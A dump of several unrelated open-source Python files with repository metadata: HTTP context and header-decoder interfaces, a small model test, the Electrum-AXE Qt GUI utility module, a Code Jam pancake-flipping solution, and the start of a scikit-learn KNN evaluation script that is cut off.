Context for HTTP request content data.
'''
# ---------------------------------------------------------------- Defined
source = defines(IInputStream, doc='''
@rtype: IInputStream
The source for the request content.
''')
class ResponseHTTP(Context):
'''
Context for HTTP response data.
'''
# ---------------------------------------------------------------- Required
code = requires(int, doc='''
@rtype: integer
The HTTP response code.
''')
isSuccess = requires(bool, doc='''
@rtype: boolean
True if the response is a success, False otherwise.
''')
# ---------------------------------------------------------------- Optional
text = optional(str, doc='''
@rtype: str
The response text message (a short message).
''')
headers = optional(dict, doc='''
@rtype: dictionary{String, string}
The response headers.
''')
class ResponseContentHTTP(Context):
'''
Context for HTTP response content data.
'''
# ---------------------------------------------------------------- Required
source = requires(IInputStream, Iterable, doc='''
@rtype: IInputStream|Iterable
The source for the response content.
''')
# --------------------------------------------------------------------
class IDecoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header retrieve, parsing and decoding.
'''
@abc.abstractmethod
def retrieve(self, name):
'''
Get the raw header value.
@param name: string
The name of the header to retrieve.
@return: string|None
The raw header value or None if there is no such header.
'''
@abc.abstractmethod
def decode(self, name):
'''
        Get the decoded header value.
@param name: string
The name of the header to decode.
@return: list[tuple(string, dictionary{string:string})]
A list of tuples having as the first entry the header value and the second entry a dictionary
with the value attribute.
'''
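# Minimal sketch of an IDecoderHeader implementation over a plain dictionary
# of raw headers (illustrative only, not part of the framework; it ignores
# quoting and other edge cases a real decoder must handle):
class SimpleDecoderHeader(IDecoderHeader):
    '''Decodes headers from a {name: raw value} dictionary.'''
    def __init__(self, headers):
        self.headers = {name.lower(): value for name, value in headers.items()}
    def retrieve(self, name):
        return self.headers.get(name.lower())
    def decode(self, name):
        raw = self.retrieve(name)
        if raw is None: return []
        decoded = []
        for part in raw.split(','):
            value, _, attrs = part.partition(';')
            attributes = {}
            for attr in attrs.split(';'):
                if '=' in attr:
                    key, _, val = attr.partition('=')
                    attributes[key.strip()] = val.strip()
            decoded.append((value.strip(), attributes))
        return decoded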
class IEncoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header encoding.
'''
@abc.abstractmethod
def encode(self, name, *value):
'''
Encodes the header values.
ex:
            encode('multipart/formdata', 'mixed') == 'multipart/formdata, mixed'
            encode(('multipart/formdata', ('charset', 'utf-8'), ('boundry', '12'))) ==
'multipart/formdata; charset=utf-8; boundry=12'
@param name: string
The name of the header to set.
@param value: arguments[tuple(string, tuple(string, string))|string]
Tuples containing as first value found in the header and as the second value a tuple with the
values attribute.
''' | [
"[email protected]"
] | |
db7daaad0a903a177dcefeb07c6912390cdeb411 | b5fa959a5a1a6cd1e5027e41ed45b6dfb1c19151 | /testapp/tests/test_models.py | 63eb981a166d436d958ec9b87a1b3dde0dbd614a | [
"MIT"
] | permissive | Mikekh84/learning-journal | 13c8e036620d4286f7e6bf3c1d9df0c5e0d368d8 | d0d5af7913790ab895a2fa530aa259cf2934f49b | refs/heads/master | 2021-01-17T17:12:15.009156 | 2016-03-28T02:50:48 | 2016-03-28T02:50:48 | 54,362,834 | 0 | 1 | null | 2016-03-28T02:50:48 | 2016-03-21T05:43:15 | Python | UTF-8 | Python | false | false | 511 | py | # -*- coding: utf-8 -*-
from testapp.models import Entry, DBSession, render_markdown
def test_create_entry(dbtransaction):
"""Test for a change of state of the model."""
new_model = Entry(title="jill", text='jello')
assert new_model.id is None
DBSession.add(new_model)
DBSession.flush()
assert new_model.id is not None
def test_render_markdown():
"""Assert render markdown works."""
content = 'Hello'
output = render_markdown(content)
assert output == '<p>Hello</p>'
| [
"[email protected]"
] | |
01fcb935acc0135bfe239ab840b1a23d21b0ad2f | cb79e16729aba7d2ce04a2501cf51bcb4655bc34 | /electrum_axe/gui/qt/util.py | f27835254f268f16de26faf1512143716c5095f9 | [
"MIT"
] | permissive | ddude1/electrum-axe | ecdf69fe1ea4dd28da4817587049920a253974db | b2d030dfc2afb2ca27739b9169ac610c68421dbb | refs/heads/master | 2020-12-14T16:31:00.997749 | 2019-12-16T05:14:40 | 2019-12-16T05:14:40 | 127,673,858 | 0 | 0 | MIT | 2020-01-18T22:36:07 | 2018-04-01T21:45:54 | Python | UTF-8 | Python | false | false | 31,415 | py | import asyncio
import os.path
import time
import sys
import platform
import queue
import traceback
import os
import webbrowser
from functools import partial, lru_cache
from typing import NamedTuple, Callable, Optional, TYPE_CHECKING, Union, List, Dict
from PyQt5.QtGui import (QFont, QColor, QCursor, QPixmap, QStandardItem,
QPalette, QIcon, QFontMetrics)
from PyQt5.QtCore import (Qt, QPersistentModelIndex, QModelIndex, pyqtSignal,
QCoreApplication, QItemSelectionModel, QThread,
QSortFilterProxyModel, QSize, QLocale)
from PyQt5.QtWidgets import (QPushButton, QLabel, QMessageBox, QHBoxLayout,
QAbstractItemView, QVBoxLayout, QLineEdit,
QStyle, QDialog, QGroupBox, QButtonGroup, QRadioButton,
QFileDialog, QWidget, QToolButton, QTreeView, QPlainTextEdit,
QHeaderView, QApplication, QToolTip, QTreeWidget, QStyledItemDelegate)
from electrum_axe.i18n import _, languages
from electrum_axe.util import (FileImportFailed, FileExportFailed,
resource_path)
from electrum_axe.paymentrequest import PR_UNPAID, PR_PAID, PR_EXPIRED
if TYPE_CHECKING:
from .main_window import ElectrumWindow
if platform.system() == 'Windows':
if platform.release() in ['7', '8', '10']:
MONOSPACE_FONT = 'Consolas'
else:
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Menlo'
else:
MONOSPACE_FONT = 'monospace'
dialogs = []
pr_icons = {
PR_UNPAID:"unpaid.png",
PR_PAID:"confirmed.png",
PR_EXPIRED:"expired.png"
}
pr_tooltips = {
PR_UNPAID:_('Pending'),
PR_PAID:_('Paid'),
PR_EXPIRED:_('Expired')
}
expiration_values = [
(_('1 hour'), 60*60),
(_('1 day'), 24*60*60),
(_('1 week'), 7*24*60*60),
(_('Never'), None)
]
class EnterButton(QPushButton):
def __init__(self, text, func):
QPushButton.__init__(self, text)
self.func = func
self.clicked.connect(func)
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ThreadedButton(QPushButton):
def __init__(self, text, task, on_success=None, on_error=None):
QPushButton.__init__(self, text)
self.task = task
self.on_success = on_success
self.on_error = on_error
self.clicked.connect(self.run_task)
def run_task(self):
self.setEnabled(False)
self.thread = TaskThread(self)
self.thread.add(self.task, self.on_success, self.done, self.on_error)
def done(self):
self.setEnabled(True)
self.thread.stop()
class WWLabel(QLabel):
def __init__ (self, text="", parent=None):
QLabel.__init__(self, text, parent)
self.setWordWrap(True)
self.setTextInteractionFlags(Qt.TextSelectableByMouse)
class HelpLabel(QLabel):
def __init__(self, text, help_text):
QLabel.__init__(self, text)
self.help_text = help_text
self.app = QCoreApplication.instance()
self.font = QFont()
def mouseReleaseEvent(self, x):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text)
def enterEvent(self, event):
self.font.setUnderline(True)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
return QLabel.enterEvent(self, event)
def leaveEvent(self, event):
self.font.setUnderline(False)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
return QLabel.leaveEvent(self, event)
class HelpButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, '?')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text,
rich_text=True)
class InfoButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, 'Info')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(6 * char_width_in_lineedit())
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Info'),
text=self.help_text,
rich_text=True)
class Buttons(QHBoxLayout):
def __init__(self, *buttons):
QHBoxLayout.__init__(self)
self.addStretch(1)
for b in buttons:
self.addWidget(b)
class CloseButton(QPushButton):
def __init__(self, dialog):
QPushButton.__init__(self, _("Close"))
self.clicked.connect(dialog.close)
self.setDefault(True)
class CopyButton(QPushButton):
def __init__(self, text_getter, app):
QPushButton.__init__(self, _("Copy"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
class CopyCloseButton(QPushButton):
def __init__(self, text_getter, app, dialog):
QPushButton.__init__(self, _("Copy and Close"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
self.clicked.connect(dialog.close)
self.setDefault(True)
class OkButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("OK"))
self.clicked.connect(dialog.accept)
self.setDefault(True)
class CancelButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("Cancel"))
self.clicked.connect(dialog.reject)
class MessageBoxMixin(object):
def top_level_window_recurse(self, window=None, test_func=None):
window = window or self
classes = (WindowModalDialog, QMessageBox)
if test_func is None:
test_func = lambda x: True
for n, child in enumerate(window.children()):
# Test for visibility as old closed dialogs may not be GC-ed.
# Only accept children that confirm to test_func.
if isinstance(child, classes) and child.isVisible() \
and test_func(child):
return self.top_level_window_recurse(child, test_func=test_func)
return window
def top_level_window(self, test_func=None):
return self.top_level_window_recurse(test_func)
def question(self, msg, parent=None, title=None, icon=None, **kwargs) -> bool:
Yes, No = QMessageBox.Yes, QMessageBox.No
return Yes == self.msg_box(icon=icon or QMessageBox.Question,
parent=parent,
title=title or '',
text=msg,
buttons=Yes|No,
defaultButton=No,
**kwargs)
def show_warning(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
title or _('Warning'), msg, **kwargs)
def show_error(self, msg, parent=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
_('Error'), msg, **kwargs)
def show_critical(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Critical, parent,
title or _('Critical Error'), msg, **kwargs)
def show_message(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Information, parent,
title or _('Information'), msg, **kwargs)
def msg_box(self, icon, parent, title, text, *, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
parent = parent or self.top_level_window()
return custom_message_box(icon=icon,
parent=parent,
title=title,
text=text,
buttons=buttons,
defaultButton=defaultButton,
rich_text=rich_text,
checkbox=checkbox)
def custom_message_box(*, icon, parent, title, text, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
if type(icon) is QPixmap:
d = QMessageBox(QMessageBox.Information, title, str(text), buttons, parent)
d.setIconPixmap(icon)
else:
d = QMessageBox(icon, title, str(text), buttons, parent)
d.setWindowModality(Qt.WindowModal)
d.setDefaultButton(defaultButton)
if rich_text:
d.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
# set AutoText instead of RichText
# AutoText lets Qt figure out whether to render as rich text.
# e.g. if text is actually plain text and uses "\n" newlines;
# and we set RichText here, newlines would be swallowed
d.setTextFormat(Qt.AutoText)
else:
d.setTextInteractionFlags(Qt.TextSelectableByMouse)
d.setTextFormat(Qt.PlainText)
if checkbox is not None:
d.setCheckBox(checkbox)
return d.exec_()
class WindowModalDialog(QDialog, MessageBoxMixin):
'''Handy wrapper; window modal dialogs are better for our multi-window
daemon model as other wallet windows can still be accessed.'''
def __init__(self, parent, title=None):
QDialog.__init__(self, parent)
self.setWindowModality(Qt.WindowModal)
if title:
self.setWindowTitle(title)
class WaitingDialog(WindowModalDialog):
'''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, parent, message, task, on_success=None, on_error=None):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
vbox = QVBoxLayout(self)
vbox.addWidget(QLabel(message))
self.accepted.connect(self.on_accepted)
self.show()
self.thread = TaskThread(self)
self.thread.finished.connect(self.deleteLater) # see #3956
self.thread.add(task, on_success, self.accept, on_error)
def wait(self):
self.thread.wait()
def on_accepted(self):
self.thread.stop()
def line_dialog(parent, title, label, ok_label, default=None):
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(500)
l = QVBoxLayout()
dialog.setLayout(l)
l.addWidget(QLabel(label))
txt = QLineEdit()
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.text()
def text_dialog(parent, title, header_layout, ok_label, default=None, allow_multi=False):
from .qrtextedit import ScanQRTextEdit
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(600)
l = QVBoxLayout()
dialog.setLayout(l)
if isinstance(header_layout, str):
l.addWidget(QLabel(header_layout))
else:
l.addLayout(header_layout)
txt = ScanQRTextEdit(allow_multi=allow_multi)
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.toPlainText()
class ChoicesLayout(object):
def __init__(self, msg, choices, on_clicked=None, checked_index=0):
vbox = QVBoxLayout()
if len(msg) > 50:
vbox.addWidget(WWLabel(msg))
msg = ""
gb2 = QGroupBox(msg)
vbox.addWidget(gb2)
vbox2 = QVBoxLayout()
gb2.setLayout(vbox2)
self.group = group = QButtonGroup()
for i,c in enumerate(choices):
button = QRadioButton(gb2)
button.setText(c)
vbox2.addWidget(button)
group.addButton(button)
group.setId(button, i)
if i==checked_index:
button.setChecked(True)
if on_clicked:
group.buttonClicked.connect(partial(on_clicked, self))
self.vbox = vbox
def layout(self):
return self.vbox
def selected_index(self):
return self.group.checkedId()
def address_field(addresses):
hbox = QHBoxLayout()
address_e = QLineEdit()
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
else:
addresses = []
def func():
try:
i = addresses.index(str(address_e.text())) + 1
i = i % len(addresses)
address_e.setText(addresses[i])
except ValueError:
# the user might have changed address_e to an
# address not in the wallet (or to something that isn't an address)
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
button = QPushButton(_('Address'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(address_e)
return hbox, address_e
def filename_field(parent, config, defaultname, select_msg):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Format")))
gb = QGroupBox("format", parent)
b1 = QRadioButton(gb)
b1.setText(_("CSV"))
b1.setChecked(True)
b2 = QRadioButton(gb)
b2.setText(_("json"))
vbox.addWidget(b1)
vbox.addWidget(b2)
hbox = QHBoxLayout()
directory = config.get('io_dir', os.path.expanduser('~'))
    path = os.path.join(directory, defaultname)
filename_e = QLineEdit()
filename_e.setText(path)
def func():
text = filename_e.text()
_filter = "*.csv" if text.endswith(".csv") else "*.json" if text.endswith(".json") else None
p, __ = QFileDialog.getSaveFileName(None, select_msg, text, _filter)
if p:
filename_e.setText(p)
button = QPushButton(_('File'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(filename_e)
vbox.addLayout(hbox)
def set_csv(v):
text = filename_e.text()
text = text.replace(".json",".csv") if v else text.replace(".csv",".json")
filename_e.setText(text)
b1.clicked.connect(lambda: set_csv(True))
b2.clicked.connect(lambda: set_csv(False))
return vbox, filename_e, b1
class ElectrumItemDelegate(QStyledItemDelegate):
def __init__(self, tv):
super().__init__(tv)
self.tv = tv
self.opened = None
def on_closeEditor(editor: QLineEdit, hint):
self.opened = None
def on_commitData(editor: QLineEdit):
new_text = editor.text()
idx = QModelIndex(self.opened)
row, col = idx.row(), idx.column()
_prior_text, user_role = self.tv.text_txid_from_coordinate(row, col)
# check that we didn't forget to set UserRole on an editable field
assert user_role is not None, (row, col)
self.tv.on_edited(idx, user_role, new_text)
self.closeEditor.connect(on_closeEditor)
self.commitData.connect(on_commitData)
def createEditor(self, parent, option, idx):
self.opened = QPersistentModelIndex(idx)
return super().createEditor(parent, option, idx)
class MyTreeView(QTreeView):
def __init__(self, parent: 'ElectrumWindow', create_menu, stretch_column=None, editable_columns=None):
super().__init__(parent)
self.parent = parent
self.config = self.parent.config
self.stretch_column = stretch_column
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# Control which columns are editable
if editable_columns is None:
editable_columns = {stretch_column}
else:
editable_columns = set(editable_columns)
self.editable_columns = editable_columns
self.setItemDelegate(ElectrumItemDelegate(self))
self.current_filter = ""
self.setRootIsDecorated(False) # remove left margin
self.toolbar_shown = False
# When figuring out the size of columns, Qt by default looks at
# the first 1000 rows (at least if resize mode is QHeaderView.ResizeToContents).
# This would be REALLY SLOW, and it's not perfect anyway.
# So to speed the UI up considerably, set it to
# only look at as many rows as currently visible.
self.header().setResizeContentsPrecision(0)
def set_editability(self, items):
for idx, i in enumerate(items):
i.setEditable(idx in self.editable_columns)
def selected_in_column(self, column: int):
items = self.selectionModel().selectedIndexes()
return list(x for x in items if x.column() == column)
def current_item_user_role(self, col) -> Optional[QStandardItem]:
idx = self.selectionModel().currentIndex()
idx = idx.sibling(idx.row(), col)
item = self.model().itemFromIndex(idx)
if item:
return item.data(Qt.UserRole)
def set_current_idx(self, set_current: QPersistentModelIndex):
if set_current:
assert isinstance(set_current, QPersistentModelIndex)
assert set_current.isValid()
self.selectionModel().select(QModelIndex(set_current), QItemSelectionModel.SelectCurrent)
def update_headers(self, headers: Union[List[str], Dict[int, str]]):
# headers is either a list of column names, or a dict: (col_idx->col_name)
if not isinstance(headers, dict): # convert to dict
headers = dict(enumerate(headers))
col_names = [headers[col_idx] for col_idx in sorted(headers.keys())]
model = self.model()
model.setHorizontalHeaderLabels(col_names)
self.header().setStretchLastSection(False)
self.header().setDefaultAlignment(Qt.AlignCenter)
for col_idx in headers:
sm = QHeaderView.Stretch if col_idx == self.stretch_column else QHeaderView.ResizeToContents
self.header().setSectionResizeMode(col_idx, sm)
def keyPressEvent(self, event):
if self.itemDelegate().opened:
return
if event.key() in [ Qt.Key_F2, Qt.Key_Return ]:
self.on_activated(self.selectionModel().currentIndex())
return
super().keyPressEvent(event)
def on_activated(self, idx):
# on 'enter' we show the menu
pt = self.visualRect(idx).bottomLeft()
pt.setX(50)
self.customContextMenuRequested.emit(pt)
def edit(self, idx, trigger=QAbstractItemView.AllEditTriggers, event=None):
"""
this is to prevent:
edit: editing failed
from inside qt
"""
return super().edit(idx, trigger, event)
def on_edited(self, idx: QModelIndex, user_role, text):
self.parent.wallet.set_label(user_role, text)
self.parent.history_model.refresh('on_edited in MyTreeView')
self.parent.update_completions()
def should_hide(self, row):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
return False
def text_txid_from_coordinate(self, row_num, column):
assert not isinstance(self.model(), QSortFilterProxyModel)
idx = self.model().index(row_num, column)
item = self.model().itemFromIndex(idx)
user_role = item.data(Qt.UserRole)
return item.text(), user_role
def hide_row(self, row_num):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
should_hide = self.should_hide(row_num)
if not self.current_filter and should_hide is None:
# no filters at all, neither date nor search
self.setRowHidden(row_num, QModelIndex(), False)
return
for column in self.filter_columns:
txt, _ = self.text_txid_from_coordinate(row_num, column)
txt = txt.lower()
if self.current_filter in txt:
# the filter matched, but the date filter might apply
self.setRowHidden(row_num, QModelIndex(), bool(should_hide))
break
else:
# we did not find the filter in any columns, hide the item
self.setRowHidden(row_num, QModelIndex(), True)
def filter(self, p=None):
if p is not None:
p = p.lower()
self.current_filter = p
self.hide_rows()
def hide_rows(self):
for row in range(self.model().rowCount()):
self.hide_row(row)
def create_toolbar(self, config=None):
hbox = QHBoxLayout()
buttons = self.get_toolbar_buttons()
for b in buttons:
b.setVisible(False)
hbox.addWidget(b)
hide_button = QPushButton('x')
hide_button.setVisible(False)
hide_button.pressed.connect(lambda: self.show_toolbar(False, config))
self.toolbar_buttons = buttons + (hide_button,)
hbox.addStretch()
hbox.addWidget(hide_button)
return hbox
def save_toolbar_state(self, state, config):
pass # implemented in subclasses
def show_toolbar(self, state, config=None):
if state == self.toolbar_shown:
return
self.toolbar_shown = state
if config:
self.save_toolbar_state(state, config)
for b in self.toolbar_buttons:
b.setVisible(state)
if not state:
self.on_hide_toolbar()
def toggle_toolbar(self, config=None):
self.show_toolbar(not self.toolbar_shown, config)
class ButtonsWidget(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.buttons = []
def resizeButtons(self):
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
x = self.rect().right() - frameWidth
y = self.rect().bottom() - frameWidth
for button in self.buttons:
sz = button.sizeHint()
x -= sz.width()
button.move(x, y - sz.height())
def addButton(self, icon_name, on_click, tooltip):
button = QToolButton(self)
button.setIcon(read_QIcon(icon_name))
iconSize = QLineEdit().sizeHint().height() - 7 # 3px (button sz - icon sz), 2px borders, 2px padding
button.setIconSize(QSize(iconSize, iconSize))
button.setCursor(QCursor(Qt.PointingHandCursor))
button.setStyleSheet("QToolButton { border: none; hover {border: 1px} pressed {border: 1px} padding: 0px; }")
button.setVisible(True)
button.setToolTip(tooltip)
button.clicked.connect(on_click)
self.buttons.append(button)
return button
def addCopyButton(self, app):
self.app = app
self.addButton("copy.png", self.on_copy, _("Copy to clipboard"))
def on_copy(self):
self.app.clipboard().setText(self.text())
QToolTip.showText(QCursor.pos(), _("Text copied to clipboard"), self)
class ButtonsLineEdit(QLineEdit, ButtonsWidget):
def __init__(self, text=None):
QLineEdit.__init__(self, text)
self.buttons = []
def resizeEvent(self, e):
o = QLineEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class ButtonsTextEdit(QPlainTextEdit, ButtonsWidget):
def __init__(self, text=None):
QPlainTextEdit.__init__(self, text)
self.setText = self.setPlainText
self.text = self.toPlainText
self.buttons = []
def resizeEvent(self, e):
o = QPlainTextEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class TaskThread(QThread):
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the context of its parent.'''
class Task(NamedTuple):
task: Callable
cb_success: Optional[Callable]
cb_done: Optional[Callable]
cb_error: Optional[Callable]
doneSig = pyqtSignal(object, object, object)
def __init__(self, parent, on_error=None):
super(TaskThread, self).__init__(parent)
self.on_error = on_error
self.tasks = queue.Queue()
self.doneSig.connect(self.on_done)
self.start()
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get() # type: TaskThread.Task
if not task:
break
try:
result = task.task()
self.doneSig.emit(result, task.cb_done, task.cb_success)
except BaseException:
self.doneSig.emit(sys.exc_info(), task.cb_done, task.cb_error)
def on_done(self, result, cb_done, cb_result):
# This runs in the parent's thread.
if cb_done:
cb_done()
if cb_result:
cb_result(result)
def stop(self):
self.tasks.put(None)
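# Example usage (sketch; `fetch_data` and `label` are placeholders, not part
# of this module):
#     thread = TaskThread(parent_widget)
#     thread.add(fetch_data,
#                on_success=lambda result: label.setText(str(result)),
#                on_error=lambda exc_info: print(exc_info))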
class ColorSchemeItem:
def __init__(self, fg_color, bg_color):
self.colors = (fg_color, bg_color)
def _get_color(self, background):
return self.colors[(int(background) + int(ColorScheme.dark_scheme)) % 2]
def as_stylesheet(self, background=False):
css_prefix = "background-" if background else ""
color = self._get_color(background)
return "QWidget {{ {}color:{}; }}".format(css_prefix, color)
def as_color(self, background=False):
color = self._get_color(background)
return QColor(color)
class ColorScheme:
dark_scheme = False
GREEN = ColorSchemeItem("#117c11", "#8af296")
YELLOW = ColorSchemeItem("#897b2a", "#ffff00")
RED = ColorSchemeItem("#7c1111", "#f18c8c")
BLUE = ColorSchemeItem("#123b7c", "#8cb3f2")
PURPLE = ColorSchemeItem("#8A2BE2", "#8A2BE2")
DEFAULT = ColorSchemeItem("#818181", "white")
@staticmethod
def has_dark_background(widget):
brightness = sum(widget.palette().color(QPalette.Background).getRgb()[0:3])
return brightness < (255*3/2)
@staticmethod
def update_from_widget(widget, force_dark=False):
if force_dark or ColorScheme.has_dark_background(widget):
ColorScheme.dark_scheme = True
class AcceptFileDragDrop:
def __init__(self, file_type=""):
assert isinstance(self, QWidget)
self.setAcceptDrops(True)
self.file_type = file_type
def validateEvent(self, event):
if not event.mimeData().hasUrls():
event.ignore()
return False
for url in event.mimeData().urls():
if not url.toLocalFile().endswith(self.file_type):
event.ignore()
return False
event.accept()
return True
def dragEnterEvent(self, event):
self.validateEvent(event)
def dragMoveEvent(self, event):
if self.validateEvent(event):
event.setDropAction(Qt.CopyAction)
def dropEvent(self, event):
if self.validateEvent(event):
for url in event.mimeData().urls():
self.onFileAdded(url.toLocalFile())
def onFileAdded(self, fn):
raise NotImplementedError()
def import_meta_gui(electrum_window, title, importer, on_success):
filter_ = "JSON (*.json);;All files (*)"
filename = electrum_window.getOpenFileName(_("Open {} file").format(title), filter_)
if not filename:
return
try:
importer(filename)
except FileImportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {} were successfully imported").format(title))
on_success()
def export_meta_gui(electrum_window, title, exporter):
filter_ = "JSON (*.json);;All files (*)"
filename = electrum_window.getSaveFileName(_("Select file to save your {}").format(title),
'electrum_{}.json'.format(title), filter_)
if not filename:
return
try:
exporter(filename)
except FileExportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {0} were exported to '{1}'")
.format(title, str(filename)))
def get_parent_main_window(widget):
"""Returns a reference to the ElectrumWindow this widget belongs to."""
from .main_window import ElectrumWindow
for _ in range(100):
if widget is None:
return None
if not isinstance(widget, ElectrumWindow):
widget = widget.parentWidget()
else:
return widget
return None
def icon_path(icon_basename):
return resource_path('gui', 'icons', icon_basename)
@lru_cache(maxsize=1000)
def read_QIcon(icon_basename):
return QIcon(icon_path(icon_basename))
def get_default_language():
name = QLocale.system().name()
return name if name in languages else 'en_UK'
class FromList(QTreeWidget):
def __init__(self, parent, create_menu):
super().__init__(parent)
self.setHeaderHidden(True)
self.setMaximumHeight(300)
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# remove left margin
self.setRootIsDecorated(False)
self.setColumnCount(2)
self.header().setStretchLastSection(False)
sm = QHeaderView.ResizeToContents
self.header().setSectionResizeMode(0, sm)
self.header().setSectionResizeMode(1, sm)
def char_width_in_lineedit() -> int:
char_width = QFontMetrics(QLineEdit().font()).averageCharWidth()
# 'averageCharWidth' seems to underestimate on Windows, hence 'max()'
return max(9, char_width)
def webopen(url: str):
if sys.platform == 'linux' and os.environ.get('APPIMAGE'):
# When on Linux webbrowser.open can fail in AppImage because it can't find the correct libdbus.
# We just fork the process and unset LD_LIBRARY_PATH before opening the URL.
# See #5425
if os.fork() == 0:
del os.environ['LD_LIBRARY_PATH']
webbrowser.open(url)
sys.exit(0)
else:
webbrowser.open(url)
if __name__ == "__main__":
app = QApplication([])
t = WaitingDialog(None, 'testing ...', lambda: [time.sleep(1)], lambda x: QMessageBox.information(None, 'done', "done"))
t.start()
app.exec_()
| [
"[email protected]"
] | |
e218ccbde421b4913b280795d031f3fc87789818 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/773.py | 30a001a8f7c676f7eb2fe925665c826df0915c48 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | # Problem A. Oversized Pancake Flipper
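# Greedy strategy: scan left to right; whenever a '-' pancake is found,
# flip the window of K pancakes starting there. If a '-' remains with
# fewer than K pancakes to its right, the case is IMPOSSIBLE.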
import os
SOURCE = '%s/../Resources/Q1Al.in' % os.path.dirname(__file__)
TARGET = '%s/../Resources/Q1Al.out' % os.path.dirname(__file__)
INPUT = open(SOURCE).read().splitlines()
OUTPUT = open(TARGET, 'w')
T = int(INPUT.pop(0))
for t0 in xrange(T):
print >> OUTPUT, 'Case #%d:' % (t0 + 1),
S, K = INPUT.pop(0).split()
A, K = ['+' == s for s in S], int(K)
L = len(A)
r = 0
for i, a in enumerate(A):
if not a:
if i + K > L:
print >> OUTPUT, 'IMPOSSIBLE'
break
r += 1
for k in xrange(K):
A[i+k] = not A[i+k]
else:
print >> OUTPUT, r
| [
"[email protected]"
] | |
30bab34cfeff4c18f9f343631ed0cdb6410ae39a | baf3996414315ffb60470c40c7ad797bf4e6897f | /02_ai/1_ml/3_data_preparation/code/chapter_18/02_model_evaluation.py | c6093bdc54ef4415a5811861005577357adb543d | [
"MIT"
] | permissive | thiago-allue/portfolio | 8fbbecca7ce232567aebe97c19944f444508b7f4 | 0acd8253dc7c5150fef9b2d46eead3db83ca42de | refs/heads/main | 2023-03-15T22:10:21.109707 | 2022-09-14T17:04:35 | 2022-09-14T17:04:35 | 207,919,073 | 0 | 0 | null | 2019-11-13T18:18:23 | 2019-09-11T22:40:46 | Python | UTF-8 | Python | false | false | 955 | py | # evaluate knn on the raw diabetes dataset
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder
# load dataset
dataset = read_csv('pima-indians-diabetes.csv', header=None)
data = dataset.values
# separate into input and output columns
X, y = data[:, :-1], data[:, -1]
# ensure inputs are floats and output is an integer label
X = X.astype('float32')
y = LabelEncoder().fit_transform(y.astype('str'))
# define and configure the model
